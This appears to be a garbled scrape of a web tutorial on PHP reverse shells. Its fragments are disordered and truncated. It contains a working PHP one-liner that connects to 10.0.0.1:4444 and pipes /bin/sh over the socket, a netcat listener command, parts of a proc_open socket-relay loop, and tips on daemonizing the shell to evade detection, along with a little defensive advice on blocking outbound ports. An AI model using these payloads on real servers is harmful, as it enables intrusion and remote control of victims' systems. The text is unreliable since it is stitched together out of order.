<?= $c=fsockopen("10.0.0.1",4444);$d=exec("/bin/sh -i <&3 >&3 2>&3"); ?>
: The target system must have an available shell interpreter ( /bin/sh , cmd.exe , PowerShell) for the reverse shell to function properly. Minimalist systems may lack these components.
nc -lvnp 4444
// Duplicate socket descriptors for STDIN, STDOUT, STDERR shell_exec('/bin/sh -i 0<&3 1>&3 2>&3'); Reverse Shell Php
The attacker finds a way to execute the PHP script (e.g., visiting https://victim.com/uploads/shell.php ).
Configure firewalls to block unauthorized outbound connections from the web server. If your application only needs to serve web traffic on ports 80 and 443, block outbound requests on random high ports (like 4444 ) to disrupt reverse shell callbacks entirely.
array("pipe", "r"), // stdin 1 => array("pipe", "w"), // stdout 2 => array("pipe", "w") // stderr ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) exit(1); // Set streams to non-blocking stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($socket, 0); while (1) if (feof($socket)) break; if (feof($pipes[1])) break; $read_a = array($socket, $pipes[1], $pipes[2]); $num_changed_streams = stream_select($read_a, $write_a, $error_a, null); if (in_array($socket, $read_a)) $input = fread($socket, $chunk_size); fwrite($pipes[0], $input); if (in_array($pipes[1], $read_a)) $input = fread($pipes[1], $chunk_size); fwrite($socket, $input); if (in_array($pipes[2], $read_a)) $input = fread($pipes[2], $chunk_size); fwrite($socket, $input); fclose($socket); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?> Use code with caution. 2. PHP One-Liners (Web Shells & Command Injections) if (!$sock) die("$errstr ($errno)<
When the target system uses Bash, a reverse shell can be implemented using shell redirection without requiring PHP process management functions:
: Specialized tools can scan PHP files for malicious patterns:
If an attacker has a limited injection point, they might use a compact PHP one-liner that leverages underlying system binaries like Bash, Perl, or Python. 2. Common PHP Payloads Once executed
// Read from shell stderr -> send to socket $stderr_read = fread($pipes[2], 1024); if ($stderr_read) fwrite($sock, $stderr_read);
is a communication pipe where the attacker can send commands that the target executes, returning the output back to the attacker. 2. Common PHP Payloads
Once executed, the tester gains interactive command-line access with the permissions of the user running the web server process (such as www-data or apache ). Common PHP Reverse Shell Payloads
More sophisticated reverse shell implementations attempt to "daemonize" the script—running it as a background process to avoid detection and prevent zombie processes. This is accomplished through POSIX functions such as pcntl_fork() and posix_setsid() when these extensions are available on the target system.
// Create a TCP socket $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)<br />\n");